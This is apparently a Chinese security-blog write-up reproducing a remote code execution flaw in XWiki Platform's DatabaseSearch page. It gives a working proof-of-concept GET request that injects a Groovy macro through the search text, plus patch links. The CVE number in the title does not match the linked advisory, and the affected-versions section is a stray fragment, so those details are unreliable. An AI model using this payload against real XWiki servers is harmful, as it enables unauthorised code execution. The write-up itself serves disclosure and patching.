【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

admin 2024年7月3日07:56:45评论8 views字数 1028阅读3分25秒阅读模式

网安引领时代,弥天点亮未来   

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)
0x01漏洞介绍

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

XWiki Platform是XWiki基金会的一套用于创建Web协作应用程序的Wiki平台。

XWiki Platform 存在安全漏洞,该漏洞源于 XWiki 的数据库搜索允许通过搜索文本远程执行代码。这允许公共 wiki 的任何访问者或封闭 wiki 的用户远程执行代码,因为默认情况下所有用户都可以访问数据库搜索。

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)
0x02影响版本

data-xwiki-reference

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)
0x03漏洞复现

1.访问漏洞环境

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

2.对漏洞进行复现

 POC 

漏洞复现

GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22MiTian%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%288888%20%2B%206666%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)

命令成功。

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

3.Yakit工具加载nuclei文件测试(漏洞存在)

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2858-8cfx-69m9https://security.snyk.io/vuln/SNYK-JAVA-ORGXWIKIPLATFORM-6595837

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日07:56:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)https://cn-sec.com/archives/2871088.html

发表评论

匿名网友 填写信息